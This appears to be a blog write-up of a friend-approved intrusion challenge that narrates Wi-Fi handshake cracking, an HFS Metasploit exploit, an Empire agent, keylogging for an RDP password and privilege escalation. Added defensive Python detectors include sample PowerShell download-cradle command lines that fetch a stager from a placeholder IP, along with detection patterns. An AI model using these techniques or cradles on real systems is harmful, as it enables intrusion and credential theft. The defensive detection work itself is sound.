So the reason I am calling this a Pentest Challenge is because a few people new to the industry don't seem to understand how computer security works: they think the famous 'iPhone' is still unbreakable, and they still don't understand that this "hacking" can happen to ANYBODY. You do not need to be a celebrity or any high-status profile; all you need to be in the eyes of a hacker is a target, and that will do.
They challenged me, thinking that I could never gain access to their PC, which they gladly showed me [cuts enumeration time for me 🙂], but I will continue with this since they said that as a "Hacker" I should be able to get everything from 0, just like in the movies. By that they mean I will need to crack the Wi-Fi key and gain access to the PC with "proof". OK, I was up to the task, and this was a perfect situation for me since it's kind of a real engagement, just with no AD. So let's get started.
I will start with the "easy" part, getting the key. He gave me the name of his current WiFi network so I could start working on it. I fired up Airodump-NG with my WiFi card and located the target.
After locating the target I proceeded to get a 4-way handshake, which will help me get the key. After waiting for clients, a de-authentication was sent with another tool called Aireplay-NG, and after a few attempts we can see in one of the terminals that a handshake was received.
Then we verify the handshake with any tool you are familiar with; I used pyrit here for how easy and reliable it still is.
OK, time to do a little more enumeration on the device. Since there were no hints about his WiFi password, rather than utilizing common word-lists I decided to go for a known attack called a keyspace attack (you can find some info here). So I decided to find info on the router and see what its most common "keyspaces" are for that device. After hard research and lots of Google I finally came up with a word-list capable of cracking the device; here is a shot of the success (I needed a couple of days for this to happen).
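On the defender's side, the de-authentication step above is the loud part of the handshake capture: a client that really leaves sends one or two such frames, while injection sends a burst. The following Python is an added example, not part of the original post or of the aircrack tools; it flags deauth bursts per BSSID in a constructed list of management frames.

```python
from collections import deque
from dataclasses import dataclass

# Constructed sample of 802.11 management frames, summarised the way a
# monitor-mode capture would give them: timestamp, BSSID, frame subtype.
# Subtype 12 is Deauthentication and 10 is Disassociation.
DEAUTH, DISASSOC = 12, 10

@dataclass(frozen=True)
class Frame:
    ts: float      # seconds since capture start
    bssid: str     # access point the frame is sent for
    subtype: int   # 802.11 management frame subtype

def find_deauth_bursts(frames, window=5.0, threshold=10):
    """Return {bssid: first_ts} for every BSSID that sees at least
    `threshold` deauth/disassoc frames inside any `window` seconds.
    A legitimate client leaving produces one or two such frames;
    injected deauths arrive in rapid bursts."""
    recent = {}   # bssid -> deque of timestamps inside the current window
    alerts = {}
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent.setdefault(f.bssid, deque())
        q.append(f.ts)
        while f.ts - q[0] > window:      # slide the window forward
            q.popleft()
        if len(q) >= threshold and f.bssid not in alerts:
            alerts[f.bssid] = q[0]       # remember when the burst began
    return alerts

# Constructed capture: AP ..01 sees beacons (subtype 8) and one normal
# disassociation; AP ..02 receives 32 deauth frames within two seconds.
SAMPLE = (
    [Frame(0.1 * i, "AA:BB:CC:DD:EE:01", 8) for i in range(50)]
    + [Frame(1.0, "AA:BB:CC:DD:EE:01", DISASSOC)]
    + [Frame(10.0 + 0.06 * i, "AA:BB:CC:DD:EE:02", DEAUTH) for i in range(32)]
)

if __name__ == "__main__":
    for bssid, start in find_deauth_bursts(SAMPLE).items():
        print(f"possible deauth flood against {bssid} from t={start:.2f}s")
```

A wireless IDS does the same counting on live frames; the threshold and window are the knobs to tune against how often clients on your network really roam.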
So let's continue. After getting the WiFi key I did a simple arp-scan to check the devices on the network, to see what's connected or anything vulnerable that could help.
After locating the PC, I proceeded with an nmap scan. Since I had no idea if he was aware of any of this, I tried to be as stealthy as possible and of course avoid anything on the PC that could get me detected.
Wait, what!? The first thing I noticed was HFS, and I was wondering how he managed to come up with this. This reminded me a lot of HTB and other stuff for OSCP students, so I immediately knew exactly how to proceed and utilized our favorite tool, Metasploit.
Wow, access (don't know why I am surprised).
After checking around I wanted to continue, get SYSTEM access and give my friend his "proof". So after this I utilized one of my personal favorite post-exploitation tools, Empire. First we need to create the PowerShell listener and get it to the PC: we move to a shell, use this one-liner from HAK5 and host the file from our attacking machine using python, and then receive an agent.
After this one-liner we received an agent; let's continue with this awesome tool.
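From the defender's side, the HAK5 one-liner and the Empire launcher both arrive as a PowerShell command line with a hidden window and a download cradle, so process-creation logs are where they show up. The following Python is an added example, not part of the original post, of Empire or of HAK5; the command lines are constructed, the `-enc` payload is built by a helper in the block, and 203.0.113.10 is a documentation address.

```python
import base64
import re

def _enc(script):  # -EncodedCommand form: base64 of UTF-16LE, for the sample
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed process-creation command lines, as a Sysmon Event 1 or
# Security 4688 record would carry them; 203.0.113.10 is a documentation
# address. Line 3 is an Empire-style launcher wrapping a download cradle.
SAMPLE_CMDLINES = [
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.10/stager.ps1')\"",
    "powershell -noP -sta -w 1 -enc " + _enc(
        "$w=New-Object Net.WebClient;IEX $w.DownloadString('http://203.0.113.10/launcher')"),
    "powershell Get-ChildItem C:\\Users | Measure-Object",
]

# Indicators of a launcher rather than an admin script; weak alone, telling together.
SUSPICIOUS = [
    (r"-w(?:indowstyle)?\s+(?:hidden|1)\b", "hidden window"),
    (r"-no?p(?:rofile)?\b", "no profile"),
    (r"\bIEX\b|Invoke-Expression", "invoke-expression"),
    (r"DownloadString|Net\.WebClient|Invoke-WebRequest", "download cradle"),
]

def decode_encoded_command(cmdline):
    """Return the script behind -enc/-EncodedCommand, or '' if there is none."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_cmdline(cmdline):
    """List the indicators found in a PowerShell command line, after decoding
    any -enc payload so an encoded launcher is judged on what it actually runs."""
    if not re.search(r"\bpowershell(?:\.exe)?\b", cmdline, re.I):
        return []
    decoded = decode_encoded_command(cmdline)
    hits = [label for pat, label in SUSPICIOUS
            if re.search(pat, cmdline + "\n" + decoded, re.I)]
    return (["encoded command"] if decoded else []) + hits

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(score_cmdline(line) or "clean", "<-", line[:60])
```

Turning on PowerShell script block logging (Event 4104) gives the same visibility on the victim side without having to decode the command line yourself.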
With this we can continue enumerating and see what we can use to our advantage to up our privileges on the PC. I utilized an incredible script called Sherlock from the Empire modules.
So something can be utilized, but we will continue with something else; messing with DLLs is not my forte for the moment, so I will search for another way. After more enumerating I found something of note on the Desktop, and I utilized searchsploit to check it out.
And searchsploit came back with 1 result.
So we copy this exploit, move it to our folder and follow the instructions to receive a SYSTEM shell.
The msfvenom command to replace the shellcode and start working:
Awesome, so with this we can start working on that SYSTEM shell and finally complete this personal challenge. I continued by figuring out how the heck I was going to access the PC, since this exploit needs to be COPIED AND PASTED into one of the fields of the application, so I had to go back and check some more.
After checking, I realized I had forgotten something very important: the RDP port is open. This means I have a chance of connecting to the PC with a full GUI, but there was one issue, I don't have a password... But as a penetration tester (ha ha) I decided that wasn't going to stop me, so I tried many options: hashes, weak creds and social engineering. The first didn't work because of my permissions, and the others would take time and a lot of luck since he is expecting this. So another idea came to mind, a simple key logger, and that's where Empire strikes again: I started running the key logger module and tested my luck.
I waited for a few hours and... success!!
Now with a password, RDP was easy. I utilized rdesktop to get access, and a full GUI screen welcomed me.
Awesome, so I continued on the privesc quest and went for the attack: I started the vulnerable software, copied in the exploit code formatted the way it's supposed to be, and set up a listener in Metasploit to wait for the connection. You might wonder, "Well hey, since you have the password why didn't you just escalate privileges with that!?" Simple: the user wasn't in the Administrators group, so that didn't work, and by luck this software was running with admin rights!!
W00t!! Finally the SYSTEM shell. I had everything I needed and a shell with the highest privileges; now to finish this off I needed the proof.txt and I was done.
So after an incredible adventure, and a check on whether I was getting rusty, this finally came to an end. It showed that having the most sophisticated tech out there does not mean all is good; we need to be aware of many other situations, such as weak passwords or outdated software and hardware, that can expose us to attacks like these. So one of my pieces of advice to him was to update his software or utilize a different one, for the time being of course. Not all of them are protected, but in this case any up-to-date software is safe; in the meantime, all that needs to be done is to be more aware of situations like these and not think that something is UNHACKABLE, because there will be someone out there with the time and skills to prove you wrong.
With this I end this post. Be careful out there in cyberspace.
Names, MACs, software and other personal info have been changed and replicated in a safe environment, so no personal information has been released.